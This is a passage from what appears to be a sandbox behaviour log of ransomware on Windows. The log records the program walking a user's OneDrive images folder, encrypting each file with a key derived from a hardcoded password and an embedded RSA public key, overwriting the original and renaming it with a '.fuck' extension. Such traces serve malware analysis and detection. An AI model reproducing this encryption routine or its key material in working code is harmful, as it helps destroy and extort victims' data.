dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x0, lpOverlapped=0x0) returned 1 [0277.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x0, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0277.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x10, lpOverlapped=0x0) returned 1 [0277.609] CloseHandle (hObject=0x5d3c) returned 1 [0277.609] CloseHandle (hObject=0x5d48) returned 1 [0277.609] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg"), bFailIfExists=0) returned 1 [0277.613] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg", dwFileAttributes=0x0) returned 1 [0277.613] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg")) returned 1 [0277.615] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.fuck")) returned 1 [0277.617] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.617] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.617] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.617] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.617] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.617] GetLastError () returned 0x0 [0277.617] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg")) returned 0x20 [0277.617] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg", dwFileAttributes=0x80) returned 1 [0277.618] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.619] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.620] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.620] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.622] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.622] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.622] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.622] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.623] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.623] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.623] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c698) returned 1 [0277.623] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c698, dwCertEncodingType=0x1, pInfo=0x2f35010*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35040*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35048*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbd08) returned 1 [0277.623] CryptEncrypt (in: hKey=0x2fbd08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.624] CryptEncrypt (in: hKey=0x2fbd08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c1d0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c1d0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.624] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2c1d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.635] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.663] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x22e, lpOverlapped=0x0) returned 1 [0277.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x22e, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x230) returned 1 [0277.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x230, lpOverlapped=0x0) returned 1 [0277.665] CloseHandle (hObject=0x5d48) returned 1 [0277.665] CloseHandle (hObject=0x5d3c) returned 1 [0277.665] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg"), bFailIfExists=0) returned 1 [0277.669] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg", dwFileAttributes=0x0) returned 1 [0277.669] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg.gsg")) returned 1 [0277.671] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\iceBucket.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\icebucket.svg.fuck")) returned 1 [0277.672] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.672] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.672] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.672] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.672] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.672] GetLastError () returned 0x0 [0277.672] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg")) returned 0x20 [0277.673] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg", dwFileAttributes=0x80) returned 1 [0277.673] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.674] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.675] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.675] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.678] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.679] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.679] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.679] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.679] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.679] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.679] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2cbe8) returned 1 [0277.679] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2cbe8, dwCertEncodingType=0x1, pInfo=0x2f351b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f351e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f351e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbf08) returned 1 [0277.680] CryptEncrypt (in: hKey=0x2fbf08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.680] CryptEncrypt (in: hKey=0x2fbf08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2cc70*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2cc70*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.680] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2cc70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2cc70*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.681] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x2ce, lpOverlapped=0x0) returned 1 [0277.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x2ce, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0277.682] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0277.684] CloseHandle (hObject=0x5d3c) returned 1 [0277.684] CloseHandle (hObject=0x5d48) returned 1 [0277.684] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg"), bFailIfExists=0) returned 1 [0277.687] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg", dwFileAttributes=0x0) returned 1 [0277.688] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg.gsg")) returned 1 [0277.689] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading.svg.fuck")) returned 1 [0277.690] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.690] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.690] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.690] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.690] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.690] GetLastError () returned 0x0 [0277.691] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg")) returned 0x20 [0277.691] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg", dwFileAttributes=0x80) returned 1 [0277.691] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 